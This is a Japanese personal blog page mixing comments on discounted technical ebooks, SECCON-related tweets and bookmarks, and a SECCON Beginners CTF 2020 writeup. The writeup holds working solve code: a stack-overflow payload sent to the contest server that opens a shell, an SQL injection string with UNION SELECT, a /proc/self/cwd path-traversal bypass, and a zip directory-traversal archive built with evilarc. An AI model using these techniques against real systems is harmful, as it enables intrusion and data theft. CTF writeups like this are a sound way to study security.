https://tatsu-zine.com/books/begging-chisel

ずっとChisel使ってみたいと思ってたけどまとまった情報みたことなかったから本があったの初めて知ってうれしかった、気になる

【半額】 グラフ・ネットワークアルゴリズムの基礎 ―数理とCプログラム

https://tatsu-zine.com/books/graph-network-algorithms-no-kiso

こっちよりは上に書いてあるやつのほうがいいかな。定番のやつがいいなあ　あとやっぱりど定番のやつは紙でほしい

セキュリティコンテストチャレンジブック

https://tatsu-zine.com/books/seccon-challengebook

詳解セキュリティコンテスト

https://tatsu-zine.com/books/ctfbook

【半額】 解題pwnable セキュリティコンテストに挑戦しよう！

https://tatsu-zine.com/books/pwnable

CTFやったことない。やってみたい！　でも入門書はなんか定番がある気がする

Kaggle Grandmasterに学ぶ 機械学習 実践アプローチ

https://tatsu-zine.com/books/kaggle-grandmaster-ml

Kaggleコンペティション チャレンジブック

https://tatsu-zine.com/books/kaggle-ml

最近Kaggle大炎上してて愉快だし、久しぶりにちょっとやってみてもいいのかもしれん

【半額】 世界標準MIT教科書　ストラング：線形代数イントロダクション　原書第4版

https://tatsu-zine.com/books/introduction-to-linear-algebra-4ed

これは評判よくて、訳もだめだってレビューあったけどそこまではひどく無い気がする・・・？

【半額】 世界標準MIT教科書｜ストラング：線形代数とデータサイエンス

https://tatsu-zine.com/books/linear-algebra-and-data-science

これは訳の評判がひどいんだよな

【半額】 世界標準MIT教科書｜ストラング：微分方程式と線形代数

https://tatsu-zine.com/books/differential-equations-and-linear-algebra

これも訳の評判がひどいんだよな

【半額】 世界標準MIT教科書 Python言語によるプログラミングイントロダクション第2版 データサイエンスとアプリケーション

https://tatsu-zine.com/books/python-programming-introduction-2ed

【半額】 世界標準MIT教科書　Python言語によるプログラミング イントロダクション

【半額】 セジウィック:アルゴリズムC 第1~4部：―基礎・データ構造・整列・探索―

https://tatsu-zine.com/books/algorithm-c-1-4

https://tatsu-zine.com/books/python-programming-introduction

お買い得だけどあんまり興味ないな

【半額】 カードゲーム制作を支える技術

https://tatsu-zine.com/books/cardgame-development

これちょっとおもしろそうで気になっちゃうな

Favorite tweets: ～幅広い業界から注目を集める日本最大のCTFコンテスト～セキュリティコンテスト「SECCON CTF」12月11日(土)-12日(日)開催 https://t.co/z9gkIwXH8y 賞金総額100万もあるけど、Capture The Packetあるじゃん！！ — ほよたか (@takahoyo) Nov 19, 2021

http://twitter.com/takahoyo

🤣🤣🤣🤣Brenda Beatriz Maluca Ramos Seccon... https://www.instagram.com/p/CVsQZ6krRxgPIWZNJjMk9d0doQIrHV2qoNHBD80/?utm_medium=tumblr

SECCON Beginners CTF 2020の監視・オペレーションを支える技術 - ポン酢ブログ(β) [はてなブックマーク]

SECCON Beginners CTF 2020の監視・オペレーションを支える技術 - ポン酢ブログ(β)

LifeMemoryTeamの@atponsです。今回のSECCON Beginners CTF 2020はお楽しみいただけたでしょうか。自分は運営やインフラ整備をしておりました。 今回は、自分が担当していた監視、オペレーション部分の構築回りについて書いておきます。 死活監視 バッジ 今回参加者のみなさんには、このようなバッジを問題に付与して提...

from kjw_junichiのはてなブックマーク https://ift.tt/2ZuZ1y6

SECCON Beginners CTF 2020 writeup

writeupというのが何なのかよくわかってないですが、それっぽいのを書いてみます。CTF歴は2018年のctf4b以来2回目です。

Welcome

Discordに貼られたFlagを入れるだけ。

Spy

リストにある名前を適当に入れてみると、一瞬でレスポンスが返る時もあれば1秒ぐらいかかる時もある。 1秒かかるやつ(たぶん暗号化とかで時間かかってそう)をあつめてチェックいれればよし。

R&B

頭にRがついてたらROT13の逆、頭にBがついてたらBase64のDecodeをすればよし。Python久々に書く上にPython3は初だったのでbytesとstrの型変換でとまどった。

import base64 flag = b'BQlVrOUllRGxXY2xGNVJuQjRkVFZ5U0VVMGNVZEpiRVpTZVZadmQwOWhTVEIxTkhKTFNWSkdWRUZIUlRGWFUwRklUVlpJTVhGc1NFaDFaVVY1Ukd0Rk1qbDFSM3BuVjFwNGVXVkdWWEZYU0RCTldFZ3dRVmR5VVZOTGNGSjFTMjR6VjBWSE1rMVRXak5KV1hCTGVYZEplR3BzY0VsamJFaGhlV0pGUjFOUFNEQk5Wa1pIVFZaYVVqRm9TbUZqWVhKU2NVaElNM0ZTY25kSU1VWlJUMkZJVWsxV1NESjFhVnBVY0d0R1NIVXhUVEJ4TmsweFYyeEdNVUUxUlRCNVIwa3djVmRNYlVGclJUQXhURVZIVGpWR1ZVOVpja2x4UVZwVVFURkZVblZYYmxOaWFrRktTVlJJWVhsTFJFbFhRVUY0UlZkSk1YRlRiMGcwTlE9PQ==' def b64decode(s): return base64.b64decode(s) def rrot13(s): def f(x): ch = x if ord('a') <= ch and ch <= ord('z'): ch = ch - 13 if ch < ord('a'): ch += ord('z') - ord('a')+1 elif ord('A') <= ch and ch <= ord('Z'): ch = ch - 13 if ch < ord('A'): ch += ord('Z') - ord('A')+1 return ch return bytes([f(x) for x in s]) while True: print(flag, flag[0]) if flag[0] == ord(b'B'): flag = b64decode(flag[1:]) elif flag[0] == ord(b'R'): flag = rrot13(flag[1:]) else: print("unkwno") exit()

mask

Ghidraで逆アセンブルしたところ、2つのビットマスクに対してFLAGを1文字ずつANDをとって、結果がそれぞれ期待した文字列になるかをチェックしていた。 2つのビットマスクの情報を合わせたら元のFLAGを復元できるので、復元する。

package main import ( "fmt" ) func main() { k1 := "atd4`qdedtUpetepqeUdaaeUeaqau" k2 := "c`b bk`kj`KbababcaKbacaKiacki" m1 := byte(0x75) m2 := byte(0xeb) for i := 0; i < len(k1); i++ { var b byte b = (k1[i] & m1) | (k2[i] & m2) fmt.Printf("%c", b) } }

Beginner's Stack

適当に埋めてったらRSP is misaligned!って言われた。 どうすればいいのかよくわからんかったけど、飛ばす先の関数アドレスを+1したら大丈夫だった(よくわからん…)。

from socket import * from struct import * from time import sleep from telnetlib import Telnet s = socket(AF_INET, SOCK_STREAM) s.connect(("bs.quals.beginners.seccon.jp", 9001)) s.send(b'\x00\x00\x00\x00\x00\x00\x00\x00'*5+b'\x62\x08\x40\x00\x00\x00\x00\x00\x00') t = Telnet() t.sock = s t.interact()

ググったところtelnetlibというのを使っている方がいたので真似した。 Pythonは標準ライブラリが豊富ですごいなあとおもいました。

readme

/からのパスであること、ctfという文字列を含まないことという制約がある。 最初エスケープシーケンスとかでがんばれば回避できるかと思って試したけどうまくいかなかった。 その後、/proc/self/cwd経由の相対パスならいけることがわかった。 カレントディレクトリは/proc/self/environのPWDから取れる。

emoemoencode

Flagのフォーマット的にctf{xxx}なので、最初の文字がcに相当するとしてシーザー復号すればよし。

s = "🍣🍴🍦🌴🍢🍻🍳🍴🍥🍧🍡🍮🌰🍧🍲🍡🍰🍨🍹🍟🍢🍹🍟🍥🍭🌰🌰🌰🌰🌰🌰🍪🍩🍽" ss = "" for c in s: d = ord(c)-127843+ord('c') print(ord(c), chr(d)) ss += chr(d) print(ss)

Tweetstore

'を\'とエンコードしているが、\'を入力すれば\\'になるのでシングルクオートを閉じることができる。 あとはコメントで後続のクエリを無視して、\' UNION select user, user, now() --をsearch wordに入れれば解ける。

unzip

https://github.com/ptoomey3/evilarc これでdirectory traversalなzipをつくったらいけた。

python evilarc.py flag.txt --depth 7 --os unix

sneaky

Ghidraで逆アセンブルしたところ、ソースが複雑でよくわからなかった。 適当にぽちぽち見てたらちょうどGAMEOVER出力してるっぽいところがあって、 その近辺で10000という定数と比較しているコードがあった。 10000がハイスコア閾値なんじゃ…と思い、バイナリエディタで実行ファイルを書き換えて0にしてみる。 10000(0x0f27)が出てくるところは4箇所あって、1個だけ書き換えるだとだめで、全部書き換えたところアイテムを1個取るだけでOKになった。